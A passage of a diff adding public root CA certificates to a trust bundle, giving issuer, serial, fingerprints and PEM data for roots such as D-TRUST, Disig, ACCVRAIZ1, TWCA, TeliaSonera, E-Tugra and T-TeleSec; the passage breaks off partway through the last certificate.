+# MD5 Fingerprint: aa:c6:43:2c:5e:2d:cd:c4:34:c0:50:4f:11:02:4f:b6
+# SHA1 Fingerprint: 96:c9:1b:0b:95:b4:10:98:42:fa:d0:d8:22:79:fe:60:fa:b9:16:83
+# SHA256 Fingerprint: ee:c5:49:6b:98:8c:e9:86:25:b9:34:09:2e:ec:29:08:be:d0:b0:f3:16:c2:d4:73:0c:84:ea:f1:f3:d3:48:81
+-----BEGIN CERTIFICATE-----
+MIIEQzCCAyugAwIBAgIDCYP0MA0GCSqGSIb3DQEBCwUAMFAxCzAJBgNVBAYTAkRF
+MRUwEwYDVQQKDAxELVRydXN0IEdtYkgxKjAoBgNVBAMMIUQtVFJVU1QgUm9vdCBD
+bGFzcyAzIENBIDIgRVYgMjAwOTAeFw0wOTExMDUwODUwNDZaFw0yOTExMDUwODUw
+NDZaMFAxCzAJBgNVBAYTAkRFMRUwEwYDVQQKDAxELVRydXN0IEdtYkgxKjAoBgNV
+BAMMIUQtVFJVU1QgUm9vdCBDbGFzcyAzIENBIDIgRVYgMjAwOTCCASIwDQYJKoZI
+hvcNAQEBBQADggEPADCCAQoCggEBAJnxhDRwui+3MKCOvXwEz75ivJn9gpfSegpn
+ljgJ9hBOlSJzmY3aFS3nBfwZcyK3jpgAvDw9rKFs+9Z5JUut8Mxk2og+KbgPCdM0
+3TP1YtHhzRnp7hhPTFiu4h7WDFsVWtg6uMQYZB7jM7K1iXdODL/ZlGsTl28So/6Z
+qQTMFexgaDbtCHu39b+T7WYxg4zGcTSHThfqr4uRjRxWQa4iN1438h3Z0S0NL2lR
+p75mpoo6Kr3HGrHhFPC+Oh25z1uxav60sUYgovseO3Dvk5h9jHOW8sXvhXCtKSb8
+HgQ+HKDYD8tSg2J87otTlZCpV6LqYQXY+U3EJ/pure3511H3a6UCAwEAAaOCASQw
+ggEgMA8GA1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFNOUikxiEyoZLsyvcop9Ntea
+HNxnMA4GA1UdDwEB/wQEAwIBBjCB3QYDVR0fBIHVMIHSMIGHoIGEoIGBhn9sZGFw
+Oi8vZGlyZWN0b3J5LmQtdHJ1c3QubmV0L0NOPUQtVFJVU1QlMjBSb290JTIwQ2xh
+c3MlMjAzJTIwQ0ElMjAyJTIwRVYlMjAyMDA5LE89RC1UcnVzdCUyMEdtYkgsQz1E
+RT9jZXJ0aWZpY2F0ZXJldm9jYXRpb25saXN0MEagRKBChkBodHRwOi8vd3d3LmQt
+dHJ1c3QubmV0L2NybC9kLXRydXN0X3Jvb3RfY2xhc3NfM19jYV8yX2V2XzIwMDku
+Y3JsMA0GCSqGSIb3DQEBCwUAA4IBAQA07XtaPKSUiO8aEXUHL7P+PPoeUSbrh/Yp
+3uDx1MYkCenBz1UbtDDZzhr+BlGmFaQt77JLvyAoJUnRpjZ3NOhk31KxEcdzes05
+nsKtjHEh8lprr988TlWvsoRlFIm5d8sqMb7Po23Pb0iUMkZv53GMoKaEGTcH8gNF
+CSuGdXzfX2lXANtu2KZyIktQ1HWYVt+3GP9DQ1CuekR78HlR10M9p9OB0/DJT7na
+xpeG0ILD5EJt/rDiZE4OJudANCa1CInXCGNjOCd1HjPqbqjdn5lPdE2BiYBL3ZqX
+KVwvvoFBuYz/6n1gBp7N1z3TLqMVvKjmJuVvw9y4AyHqnxbxLFS1
+-----END CERTIFICATE-----
+
+# Issuer: CN=CA Disig Root R2 O=Disig a.s.
+# Subject: CN=CA Disig Root R2 O=Disig a.s.
+# Label: "CA Disig Root R2"
+# Serial: 10572350602393338211
+# MD5 Fingerprint: 26:01:fb:d8:27:a7:17:9a:45:54:38:1a:43:01:3b:03
+# SHA1 Fingerprint: b5:61:eb:ea:a4:de:e4:25:4b:69:1a:98:a5:57:47:c2:34:c7:d9:71
+# SHA256 Fingerprint: e2:3d:4a:03:6d:7b:70:e9:f5:95:b1:42:20:79:d2:b9:1e:df:bb:1f:b6:51:a0:63:3e:aa:8a:9d:c5:f8:07:03
+-----BEGIN CERTIFICATE-----
+MIIFaTCCA1GgAwIBAgIJAJK4iNuwisFjMA0GCSqGSIb3DQEBCwUAMFIxCzAJBgNV
+BAYTAlNLMRMwEQYDVQQHEwpCcmF0aXNsYXZhMRMwEQYDVQQKEwpEaXNpZyBhLnMu
+MRkwFwYDVQQDExBDQSBEaXNpZyBSb290IFIyMB4XDTEyMDcxOTA5MTUzMFoXDTQy
+MDcxOTA5MTUzMFowUjELMAkGA1UEBhMCU0sxEzARBgNVBAcTCkJyYXRpc2xhdmEx
+EzARBgNVBAoTCkRpc2lnIGEucy4xGTAXBgNVBAMTEENBIERpc2lnIFJvb3QgUjIw
+ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCio8QACdaFXS1tFPbCw3Oe
+NcJxVX6B+6tGUODBfEl45qt5WDza/3wcn9iXAng+a0EE6UG9vgMsRfYvZNSrXaNH
+PWSb6WiaxswbP7q+sos0Ai6YVRn8jG+qX9pMzk0DIaPY0jSTVpbLTAwAFjxfGs3I
+x2ymrdMxp7zo5eFm1tL7A7RBZckQrg4FY8aAamkw/dLukO8NJ9+flXP04SXabBbe
+QTg06ov80egEFGEtQX6sx3dOy1FU+16SGBsEWmjGycT6txOgmLcRK7fWV8x8nhfR
+yyX+hk4kLlYMeE2eARKmK6cBZW58Yh2EhN/qwGu1pSqVg8NTEQxzHQuyRpDRQjrO
+QG6Vrf/GlK1ul4SOfW+eioANSW1z4nuSHsPzwfPrLgVv2RvPN3YEyLRa5Beny912
+H9AZdugsBbPWnDTYltxhh5EF5EQIM8HauQhl1K6yNg3ruji6DOWbnuuNZt2Zz9aJ
+QfYEkoopKW1rOhzndX0CcQ7zwOe9yxndnWCywmZgtrEE7snmhrmaZkCo5xHtgUUD
+i/ZnWejBBhG93c+AAk9lQHhcR1DIm+YfgXvkRKhbhZri3lrVx/k6RGZL5DJUfORs
+nLMOPReisjQS1n6yqEm70XooQL6iFh/f5DcfEXP7kAplQ6INfPgGAVUzfbANuPT1
+rqVCV3w2EYx7XsQDnYx5nQIDAQABo0IwQDAPBgNVHRMBAf8EBTADAQH/MA4GA1Ud
+DwEB/wQEAwIBBjAdBgNVHQ4EFgQUtZn4r7CU9eMg1gqtzk5WpC5uQu0wDQYJKoZI
+hvcNAQELBQADggIBACYGXnDnZTPIgm7ZnBc6G3pmsgH2eDtpXi/q/075KMOYKmFM
+tCQSin1tERT3nLXK5ryeJ45MGcipvXrA1zYObYVybqjGom32+nNjf7xueQgcnYqf
+GopTpti72TVVsRHFqQOzVju5hJMiXn7B9hJSi+osZ7z+Nkz1uM/Rs0mSO9MpDpkb
+lvdhuDvEK7Z4bLQjb/D907JedR+Zlais9trhxTF7+9FGs9K8Z7RiVLoJ92Owk6Ka
++elSLotgEqv89WBW7xBci8QaQtyDW2QOy7W81k/BfDxujRNt+3vrMNDcTa/F1bal
+TFtxyegxvug4BkihGuLq0t4SOVga/4AOgnXmt8kHbA7v/zjxmHHEt38OFdAlab0i
+nSvtBfZGR6ztwPDUO+Ls7pZbkBNOHlY667DvlruWIxG68kOGdGSVyCh13x01utI3
+gzhTODY7z2zp+WsO0PsE6E9312UBeIYMej4hYvF/Y3EMyZ9E26gnonW+boE+18Dr
+G5gPcFw0sorMwIUY6256s/daoQe/qUKS82Ail+QUoQebTnbAjn39pCXHR+3/H3Os
+zMOl6W8KjptlwlCFtaOgUxLMVYdh84GuEEZhvUQhuMI9dM9+JDX6HAcOmz0iyu8x
+L4ysEr3vQCj8KWefshNPZiTEUxnpHikV7+ZtsH8tZ/3zbBt1RqPlShfppNcL
+-----END CERTIFICATE-----
+
+# Issuer: CN=ACCVRAIZ1 O=ACCV OU=PKIACCV
+# Subject: CN=ACCVRAIZ1 O=ACCV OU=PKIACCV
+# Label: "ACCVRAIZ1"
+# Serial: 6828503384748696800
+# MD5 Fingerprint: d0:a0:5a:ee:05:b6:09:94:21:a1:7d:f1:b2:29:82:02
+# SHA1 Fingerprint: 93:05:7a:88:15:c6:4f:ce:88:2f:fa:91:16:52:28:78:bc:53:64:17
+# SHA256 Fingerprint: 9a:6e:c0:12:e1:a7:da:9d:be:34:19:4d:47:8a:d7:c0:db:18:22:fb:07:1d:f1:29:81:49:6e:d1:04:38:41:13
+-----BEGIN CERTIFICATE-----
+MIIH0zCCBbugAwIBAgIIXsO3pkN/pOAwDQYJKoZIhvcNAQEFBQAwQjESMBAGA1UE
+AwwJQUNDVlJBSVoxMRAwDgYDVQQLDAdQS0lBQ0NWMQ0wCwYDVQQKDARBQ0NWMQsw
+CQYDVQQGEwJFUzAeFw0xMTA1MDUwOTM3MzdaFw0zMDEyMzEwOTM3MzdaMEIxEjAQ
+BgNVBAMMCUFDQ1ZSQUlaMTEQMA4GA1UECwwHUEtJQUNDVjENMAsGA1UECgwEQUND
+VjELMAkGA1UEBhMCRVMwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCb
+qau/YUqXry+XZpp0X9DZlv3P4uRm7x8fRzPCRKPfmt4ftVTdFXxpNRFvu8gMjmoY
+HtiP2Ra8EEg2XPBjs5BaXCQ316PWywlxufEBcoSwfdtNgM3802/J+Nq2DoLSRYWo
+G2ioPej0RGy9ocLLA76MPhMAhN9KSMDjIgro6TenGEyxCQ0jVn8ETdkXhBilyNpA
+lHPrzg5XPAOBOp0KoVdDaaxXbXmQeOW1tDvYvEyNKKGno6e6Ak4l0Squ7a4DIrhr
+IA8wKFSVf+DuzgpmndFALW4ir50awQUZ0m/A8p/4e7MCQvtQqR0tkw8jq8bBD5L/
+0KIV9VMJcRz/RROE5iZe+OCIHAr8Fraocwa48GOEAqDGWuzndN9wrqODJerWx5eH
+k6fGioozl2A3ED6XPm4pFdahD9GILBKfb6qkxkLrQaLjlUPTAYVtjrs78yM2x/47
+4KElB0iryYl0/wiPgL/AlmXz7uxLaL2diMMxs0Dx6M/2OLuc5NF/1OVYm3z61PMO
+m3WR5LpSLhl+0fXNWhn8ugb2+1KoS5kE3fj5tItQo05iifCHJPqDQsGH+tUtKSpa
+cXpkatcnYGMN285J9Y0fkIkyF/hzQ7jSWpOGYdbhdQrqeWZ2iE9x6wQl1gpaepPl
+uUsXQA+xtrn13k/c4LOsOxFwYIRKQ26ZIMApcQrAZQIDAQABo4ICyzCCAscwfQYI
+KwYBBQUHAQEEcTBvMEwGCCsGAQUFBzAChkBodHRwOi8vd3d3LmFjY3YuZXMvZmls
+ZWFkbWluL0FyY2hpdm9zL2NlcnRpZmljYWRvcy9yYWl6YWNjdjEuY3J0MB8GCCsG
+AQUFBzABhhNodHRwOi8vb2NzcC5hY2N2LmVzMB0GA1UdDgQWBBTSh7Tj3zcnk1X2
+VuqB5TbMjB4/vTAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNKHtOPfNyeT
+VfZW6oHlNsyMHj+9MIIBcwYDVR0gBIIBajCCAWYwggFiBgRVHSAAMIIBWDCCASIG
+CCsGAQUFBwICMIIBFB6CARAAQQB1AHQAbwByAGkAZABhAGQAIABkAGUAIABDAGUA
+cgB0AGkAZgBpAGMAYQBjAGkA8wBuACAAUgBhAO0AegAgAGQAZQAgAGwAYQAgAEEA
+QwBDAFYAIAAoAEEAZwBlAG4AYwBpAGEAIABkAGUAIABUAGUAYwBuAG8AbABvAGcA
+7QBhACAAeQAgAEMAZQByAHQAaQBmAGkAYwBhAGMAaQDzAG4AIABFAGwAZQBjAHQA
+cgDzAG4AaQBjAGEALAAgAEMASQBGACAAUQA0ADYAMAAxADEANQA2AEUAKQAuACAA
+QwBQAFMAIABlAG4AIABoAHQAdABwADoALwAvAHcAdwB3AC4AYQBjAGMAdgAuAGUA
+czAwBggrBgEFBQcCARYkaHR0cDovL3d3dy5hY2N2LmVzL2xlZ2lzbGFjaW9uX2Mu
+aHRtMFUGA1UdHwROMEwwSqBIoEaGRGh0dHA6Ly93d3cuYWNjdi5lcy9maWxlYWRt
+aW4vQXJjaGl2b3MvY2VydGlmaWNhZG9zL3JhaXphY2N2MV9kZXIuY3JsMA4GA1Ud
+DwEB/wQEAwIBBjAXBgNVHREEEDAOgQxhY2N2QGFjY3YuZXMwDQYJKoZIhvcNAQEF
+BQADggIBAJcxAp/n/UNnSEQU5CmH7UwoZtCPNdpNYbdKl02125DgBS4OxnnQ8pdp
+D70ER9m+27Up2pvZrqmZ1dM8MJP1jaGo/AaNRPTKFpV8M9xii6g3+CfYCS0b78gU
+JyCpZET/LtZ1qmxNYEAZSUNUY9rizLpm5U9EelvZaoErQNV/+QEnWCzI7UiRfD+m
+AM/EKXMRNt6GGT6d7hmKG9Ww7Y49nCrADdg9ZuM8Db3VlFzi4qc1GwQA9j9ajepD
+vV+JHanBsMyZ4k0ACtrJJ1vnE5Bc5PUzolVt3OAJTS+xJlsndQAJxGJ3KQhfnlms
+tn6tn1QwIgPBHnFk/vk4CpYY3QIUrCPLBhwepH2NDd4nQeit2hW3sCPdK6jT2iWH
+7ehVRE2I9DZ+hJp4rPcOVkkO1jMl1oRQQmwgEh0q1b688nCBpHBgvgW1m54ERL5h
+I6zppSSMEYCUWqKiuUnSwdzRp+0xESyeGabu4VXhwOrPDYTkF7eifKXeVSUG7szA
+h1xA2syVP1XgNce4hL60Xc16gwFy7ofmXx2utYXGJt/mwZrpHgJHnyqobalbz+xF
+d3+YJ5oyXSrjhO7FmGYvliAd3djDJ9ew+f7Zfc3Qn48LFFhRny+Lwzgt3uiP1o2H
+pPVWQxaZLPSkVrQ0uGE3ycJYgBugl6H8WY3pEfbRD0tVNEYqi4Y7
+-----END CERTIFICATE-----
+
+# Issuer: CN=TWCA Global Root CA O=TAIWAN-CA OU=Root CA
+# Subject: CN=TWCA Global Root CA O=TAIWAN-CA OU=Root CA
+# Label: "TWCA Global Root CA"
+# Serial: 3262
+# MD5 Fingerprint: f9:03:7e:cf:e6:9e:3c:73:7a:2a:90:07:69:ff:2b:96
+# SHA1 Fingerprint: 9c:bb:48:53:f6:a4:f6:d3:52:a4:e8:32:52:55:60:13:f5:ad:af:65
+# SHA256 Fingerprint: 59:76:90:07:f7:68:5d:0f:cd:50:87:2f:9f:95:d5:75:5a:5b:2b:45:7d:81:f3:69:2b:61:0a:98:67:2f:0e:1b
+-----BEGIN CERTIFICATE-----
+MIIFQTCCAymgAwIBAgICDL4wDQYJKoZIhvcNAQELBQAwUTELMAkGA1UEBhMCVFcx
+EjAQBgNVBAoTCVRBSVdBTi1DQTEQMA4GA1UECxMHUm9vdCBDQTEcMBoGA1UEAxMT
+VFdDQSBHbG9iYWwgUm9vdCBDQTAeFw0xMjA2MjcwNjI4MzNaFw0zMDEyMzExNTU5
+NTlaMFExCzAJBgNVBAYTAlRXMRIwEAYDVQQKEwlUQUlXQU4tQ0ExEDAOBgNVBAsT
+B1Jvb3QgQ0ExHDAaBgNVBAMTE1RXQ0EgR2xvYmFsIFJvb3QgQ0EwggIiMA0GCSqG
+SIb3DQEBAQUAA4ICDwAwggIKAoICAQCwBdvI64zEbooh745NnHEKH1Jw7W2CnJfF
+10xORUnLQEK1EjRsGcJ0pDFfhQKX7EMzClPSnIyOt7h52yvVavKOZsTuKwEHktSz
+0ALfUPZVr2YOy+BHYC8rMjk1Ujoog/h7FsYYuGLWRyWRzvAZEk2tY/XTP3VfKfCh
+MBwqoJimFb3u/Rk28OKRQ4/6ytYQJ0lM793B8YVwm8rqqFpD/G2Gb3PpN0Wp8DbH
+zIh1HrtsBv+baz4X7GGqcXzGHaL3SekVtTzWoWH1EfcFbx39Eb7QMAfCKbAJTibc
+46KokWofwpFFiFzlmLhxpRUZyXx1EcxwdE8tmx2RRP1WKKD+u4ZqyPpcC1jcxkt2
+yKsi2XMPpfRaAok/T54igu6idFMqPVMnaR1sjjIsZAAmY2E2TqNGtz99sy2sbZCi
+laLOz9qC5wc0GZbpuCGqKX6mOL6OKUohZnkfs8O1CWfe1tQHRvMq2uYiN2DLgbYP
+oA/pyJV/v1WRBXrPPRXAb94JlAGD1zQbzECl8LibZ9WYkTunhHiVJqRaCPgrdLQA
+BDzfuBSO6N+pjWxnkjMdwLfS7JLIvgm/LCkFbwJrnu+8vyq8W8BQj0FwcYeyTbcE
+qYSjMq+u7msXi7Kx/mzhkIyIqJdIzshNy/MGz19qCkKxHh53L46g5pIOBvwFItIm
+4TFRfTLcDwIDAQABoyMwITAOBgNVHQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB
+/zANBgkqhkiG9w0BAQsFAAOCAgEAXzSBdu+WHdXltdkCY4QWwa6gcFGn90xHNcgL
+1yg9iXHZqjNB6hQbbCEAwGxCGX6faVsgQt+i0trEfJdLjbDorMjupWkEmQqSpqsn
+LhpNgb+E1HAerUf+/UqdM+DyucRFCCEK2mlpc3INvjT+lIutwx4116KD7+U4x6WF
+H6vPNOw/KP4M8VeGTslV9xzU2KV9Bnpv1d8Q34FOIWWxtuEXeZVFBs5fzNxGiWNo
+RI2T9GRwoD2dKAXDOXC4Ynsg/eTb6QihuJ49CcdP+yz4k3ZB3lLg4VfSnQO8d57+
+nile98FRYB/e2guyLXW3Q0iT5/Z5xoRdgFlglPx4mI88k1HtQJAH32RjJMtOcQWh
+15QaiDLxInQirqWm2BJpTGCjAu4r7NRjkgtevi92a6O2JryPA9gK8kxkRr05YuWW
+6zRjESjMlfGt7+/cgFhI6Uu46mWs6fyAtbXIRfmswZ/ZuepiiI7E8UuDEq3mi4TW
+nsLrgxifarsbJGAzcMzs9zLzXNl5fe+epP7JI8Mk7hWSsT2RTyaGvWZzJBPqpK5j
+wa19hAM8EHiGG3njxPPyBJUgriOCxLM6AGK/5jYk4Ve6xx6QddVfP5VhK8E7zeWz
+aGHQRiapIVJpLesux+t3zqY6tQMzT3bR51xUAV3LePTJDL/PEo4XLSNolOer/qmy
+KwbQBM0=
+-----END CERTIFICATE-----
+
+# Issuer: CN=TeliaSonera Root CA v1 O=TeliaSonera
+# Subject: CN=TeliaSonera Root CA v1 O=TeliaSonera
+# Label: "TeliaSonera Root CA v1"
+# Serial: 199041966741090107964904287217786801558
+# MD5 Fingerprint: 37:41:49:1b:18:56:9a:26:f5:ad:c2:66:fb:40:a5:4c
+# SHA1 Fingerprint: 43:13:bb:96:f1:d5:86:9b:c1:4e:6a:92:f6:cf:f6:34:69:87:82:37
+# SHA256 Fingerprint: dd:69:36:fe:21:f8:f0:77:c1:23:a1:a5:21:c1:22:24:f7:22:55:b7:3e:03:a7:26:06:93:e8:a2:4b:0f:a3:89
+-----BEGIN CERTIFICATE-----
+MIIFODCCAyCgAwIBAgIRAJW+FqD3LkbxezmCcvqLzZYwDQYJKoZIhvcNAQEFBQAw
+NzEUMBIGA1UECgwLVGVsaWFTb25lcmExHzAdBgNVBAMMFlRlbGlhU29uZXJhIFJv
+b3QgQ0EgdjEwHhcNMDcxMDE4MTIwMDUwWhcNMzIxMDE4MTIwMDUwWjA3MRQwEgYD
+VQQKDAtUZWxpYVNvbmVyYTEfMB0GA1UEAwwWVGVsaWFTb25lcmEgUm9vdCBDQSB2
+MTCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAMK+6yfwIaPzaSZVfp3F
+VRaRXP3vIb9TgHot0pGMYzHw7CTww6XScnwQbfQ3t+XmfHnqjLWCi65ItqwA3GV1
+7CpNX8GH9SBlK4GoRz6JI5UwFpB/6FcHSOcZrr9FZ7E3GwYq/t75rH2D+1665I+X
+Z75Ljo1kB1c4VWk0Nj0TSO9P4tNmHqTPGrdeNjPUtAa9GAH9d4RQAEX1jF3oI7x+
+/jXh7VB7qTCNGdMJjmhnXb88lxhTuylixcpecsHHltTbLaC0H2kD7OriUPEMPPCs
+81Mt8Bz17Ww5OXOAFshSsCPN4D7c3TxHoLs1iuKYaIu+5b9y7tL6pe0S7fyYGKkm
+dtwoSxAgHNN/Fnct7W+A90m7UwW7XWjH1Mh1Fj+JWov3F0fUTPHSiXk+TT2YqGHe
+Oh7S+F4D4MHJHIzTjU3TlTazN19jY5szFPAtJmtTfImMMsJu7D0hADnJoWjiUIMu
+sDor8zagrC/kb2HCUQk5PotTubtn2txTuXZZNp1D5SDgPTJghSJRt8czu90VL6R4
+pgd7gUY2BIbdeTXHlSw7sKMXNeVzH7RcWe/a6hBle3rQf5+ztCo3O3CLm1u5K7fs
+slESl1MpWtTwEhDcTwK7EpIvYtQ/aUN8Ddb8WHUBiJ1YFkveupD/RwGJBmr2X7KQ
+arMCpgKIv7NHfirZ1fpoeDVNAgMBAAGjPzA9MA8GA1UdEwEB/wQFMAMBAf8wCwYD
+VR0PBAQDAgEGMB0GA1UdDgQWBBTwj1k4ALP1j5qWDNXr+nuqF+gTEjANBgkqhkiG
+9w0BAQUFAAOCAgEAvuRcYk4k9AwI//DTDGjkk0kiP0Qnb7tt3oNmzqjMDfz1mgbl
+dxSR651Be5kqhOX//CHBXfDkH1e3damhXwIm/9fH907eT/j3HEbAek9ALCI18Bmx
+0GtnLLCo4MBANzX2hFxc469CeP6nyQ1Q6g2EdvZR74NTxnr/DlZJLo961gzmJ1Tj
+TQpgcmLNkQfWpb/ImWvtxBnmq0wROMVvMeJuScg/doAmAyYp4Db29iBT4xdwNBed
+Y2gea+zDTYa4EzAvXUYNR0PVG6pZDrlcjQZIrXSHX8f8MVRBE+LHIQ6e4B4N4cB7
+Q4WQxYpYxmUKeFfyxiMPAdkgS94P+5KFdSpcc41teyWRyu5FrgZLAMzTsVlQ2jqI
+OylDRl6XK1TOU2+NSueW+r9xDkKLfP0ooNBIytrEgUy7onOTJsjrDNYmiLbAJM+7
+vVvrdX3pCI6GMyx5dwlppYn8s3CQh3aP0yK7Qs69cwsgJirQmz1wHiRszYd2qReW
+t88NkvuOGKmYSdGe/mBEciG5Ge3C9THxOUiIkCR1VBatzvT4aRRkOfujuLpwQMcn
+HL/EVlP6Y2XQ8xwOFvVrhlhNGNTkDY6lnVuR3HYkUD/GKvvZt5y11ubQ2egZixVx
+SK236thZiNSQvxaz2emsWWFUyBy6ysHK4bkgTI86k4mloMy/0/Z1pHWWbVY=
+-----END CERTIFICATE-----
+
+# Issuer: CN=E-Tugra Certification Authority O=E-Tu\u011fra EBG Bili\u015fim Teknolojileri ve Hizmetleri A.\u015e. OU=E-Tugra Sertifikasyon Merkezi
+# Subject: CN=E-Tugra Certification Authority O=E-Tu\u011fra EBG Bili\u015fim Teknolojileri ve Hizmetleri A.\u015e. OU=E-Tugra Sertifikasyon Merkezi
+# Label: "E-Tugra Certification Authority"
+# Serial: 7667447206703254355
+# MD5 Fingerprint: b8:a1:03:63:b0:bd:21:71:70:8a:6f:13:3a:bb:79:49
+# SHA1 Fingerprint: 51:c6:e7:08:49:06:6e:f3:92:d4:5c:a0:0d:6d:a3:62:8f:c3:52:39
+# SHA256 Fingerprint: b0:bf:d5:2b:b0:d7:d9:bd:92:bf:5d:4d:c1:3d:a2:55:c0:2c:54:2f:37:83:65:ea:89:39:11:f5:5e:55:f2:3c
+-----BEGIN CERTIFICATE-----
+MIIGSzCCBDOgAwIBAgIIamg+nFGby1MwDQYJKoZIhvcNAQELBQAwgbIxCzAJBgNV
+BAYTAlRSMQ8wDQYDVQQHDAZBbmthcmExQDA+BgNVBAoMN0UtVHXEn3JhIEVCRyBC
+aWxpxZ9pbSBUZWtub2xvamlsZXJpIHZlIEhpem1ldGxlcmkgQS7Fni4xJjAkBgNV
+BAsMHUUtVHVncmEgU2VydGlmaWthc3lvbiBNZXJrZXppMSgwJgYDVQQDDB9FLVR1
+Z3JhIENlcnRpZmljYXRpb24gQXV0aG9yaXR5MB4XDTEzMDMwNTEyMDk0OFoXDTIz
+MDMwMzEyMDk0OFowgbIxCzAJBgNVBAYTAlRSMQ8wDQYDVQQHDAZBbmthcmExQDA+
+BgNVBAoMN0UtVHXEn3JhIEVCRyBCaWxpxZ9pbSBUZWtub2xvamlsZXJpIHZlIEhp
+em1ldGxlcmkgQS7Fni4xJjAkBgNVBAsMHUUtVHVncmEgU2VydGlmaWthc3lvbiBN
+ZXJrZXppMSgwJgYDVQQDDB9FLVR1Z3JhIENlcnRpZmljYXRpb24gQXV0aG9yaXR5
+MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA4vU/kwVRHoViVF56C/UY
+B4Oufq9899SKa6VjQzm5S/fDxmSJPZQuVIBSOTkHS0vdhQd2h8y/L5VMzH2nPbxH
+D5hw+IyFHnSOkm0bQNGZDbt1bsipa5rAhDGvykPL6ys06I+XawGb1Q5KCKpbknSF
+Q9OArqGIW66z6l7LFpp3RMih9lRozt6Plyu6W0ACDGQXwLWTzeHxE2bODHnv0ZEo
+q1+gElIwcxmOj+GMB6LDu0rw6h8VqO4lzKRG+Bsi77MOQ7osJLjFLFzUHPhdZL3D
+k14opz8n8Y4e0ypQBaNV2cvnOVPAmJ6MVGKLJrD3fY185MaeZkJVgkfnsliNZvcH
+fC425lAcP9tDJMW/hkd5s3kc91r0E+xs+D/iWR+V7kI+ua2oMoVJl0b+SzGPWsut
+dEcf6ZG33ygEIqDUD13ieU/qbIWGvaimzuT6w+Gzrt48Ue7LE3wBf4QOXVGUnhMM
+ti6lTPk5cDZvlsouDERVxcr6XQKj39ZkjFqzAQqptQpHF//vkUAqjqFGOjGY5RH8
+zLtJVor8udBhmm9lbObDyz51Sf6Pp+KJxWfXnUYTTjF2OySznhFlhqt/7x3U+Lzn
+rFpct1pHXFXOVbQicVtbC/DP3KBhZOqp12gKY6fgDT+gr9Oq0n7vUaDmUStVkhUX
+U8u3Zg5mTPj5dUyQ5xJwx0UCAwEAAaNjMGEwHQYDVR0OBBYEFC7j27JJ0JxUeVz6
+Jyr+zE7S6E5UMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAULuPbsknQnFR5
+XPonKv7MTtLoTlQwDgYDVR0PAQH/BAQDAgEGMA0GCSqGSIb3DQEBCwUAA4ICAQAF
+Nzr0TbdF4kV1JI+2d1LoHNgQk2Xz8lkGpD4eKexd0dCrfOAKkEh47U6YA5n+KGCR
+HTAduGN8qOY1tfrTYXbm1gdLymmasoR6d5NFFxWfJNCYExL/u6Au/U5Mh/jOXKqY
+GwXgAEZKgoClM4so3O0409/lPun++1ndYYRP0lSWE2ETPo+Aab6TR7U1Q9Jauz1c
+77NCR807VRMGsAnb/WP2OogKmW9+4c4bU2pEZiNRCHu8W1Ki/QY3OEBhj0qWuJA3
++GbHeJAAFS6LrVE1Uweoa2iu+U48BybNCAVwzDk/dr2l02cmAYamU9JgO3xDf1WK
+vJUawSg5TB9D0pH0clmKuVb8P7Sd2nCcdlqMQ1DujjByTd//SffGqWfZbawCEeI6
+FiWnWAjLb1NBnEg4R2gz0dfHj9R0IdTDBZB6/86WiLEVKV0jq9BgoRJP3vQXzTLl
+yb/IQ639Lo7xr+L0mPoSHyDYwKcMhcWQ9DstliaxLL5Mq+ux0orJ23gTDx4JnW2P
+AJ8C2sH6H3p6CcRK5ogql5+Ji/03X186zjhZhkuvcQu02PJwT58yE+Owp1fl2tpD
+y4Q08ijE6m30Ku/Ba3ba+367hTzSU8JNvnHhRdH9I2cNE3X7z2VnIp2usAnRCf8d
+NL/+I5c30jn6PQ0GC7TbO6Orb1wdtn7os4I07QZcJA==
+-----END CERTIFICATE-----
+
+# Issuer: CN=T-TeleSec GlobalRoot Class 2 O=T-Systems Enterprise Services GmbH OU=T-Systems Trust Center
+# Subject: CN=T-TeleSec GlobalRoot Class 2 O=T-Systems Enterprise Services GmbH OU=T-Systems Trust Center
+# Label: "T-TeleSec GlobalRoot Class 2"
+# Serial: 1
+# MD5 Fingerprint: 2b:9b:9e:e4:7b:6c:1f:00:72:1a:cc:c1:77:79:df:6a
+# SHA1 Fingerprint: 59:0d:2d:7d:88:4f:40:2e:61:7e:a5:62:32:17:65:cf:17:d8:94:e9
+# SHA256 Fingerprint: 91:e2:f5:78:8d:58:10:eb:a7:ba:58:73:7d:e1:54:8a:8e:ca:cd:01:45:98:bc:0b:14:3e:04:1b:17:05:25:52
+-----BEGIN CERTIFICATE-----
+MIIDwzCCAqugAwIBAgIBATANBgkqhkiG9w0BAQsFADCBgjELMAkGA1UEBhMCREUx
+KzApBgNVBAoMIlQtU3lzdGVtcyBFbnRlcnByaXNlIFNlcnZpY2VzIEdtYkgxHzAd
+BgNVBAsMFlQtU3lzdGVtcyBUcnVzdCBDZW50ZXIxJTAjBgNVBAMMHFQtVGVsZVNl
+YyBHbG9iYWxSb290IENsYXNzIDIwHhcNMDgxMDAxMTA0MDE0WhcNMzMxMDAxMjM1
+OTU5WjCBgjELMAkGA1UEBhMCREUxKzApBgNVBAoMIlQtU3lzdGVtcyBFbnRlcnBy
+aXNlIFNlcnZpY2VzIEdtYkgxHzAdBgNVBAsMFlQtU3lzdGVtcyBUcnVzdCBDZW50
+ZXIxJTAjBgNVBAMMHFQtVGVsZVNlYyBHbG9iYWxSb290IENsYXNzIDIwggEiMA0G
+CSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCqX9obX+hzkeXaXPSi5kfl82hVYAUd
+AqSzm1nzHoqvNK38DcLZSBnuaY/JIPwhqgcZ7bBcrGXHX+0CfHt8LRvWurmAwhiC
+FoT6ZrAIxlQjgeTNuUk/9k9uN0goOA/FvudocP05l03Sx5iRUKrERLMjfTlH6VJi
+1hKTXrcxlkIF+3anHqP1wvzpesVsqXFP6st4vGCvx9702cu+fjOlbpSD8DT6Iavq
+jnKgP6TeMFvvhk1qlVtDRKgQFRzlAVfFmPHmBiiRqiDFt1MmUUOyCxGVWOHAD3bZ
+wI18gfNycJ5v/hqO2V81xrJvNHy+SE/iWjnX2J14np+GPgNeGYtEotXHAgMBAAGj
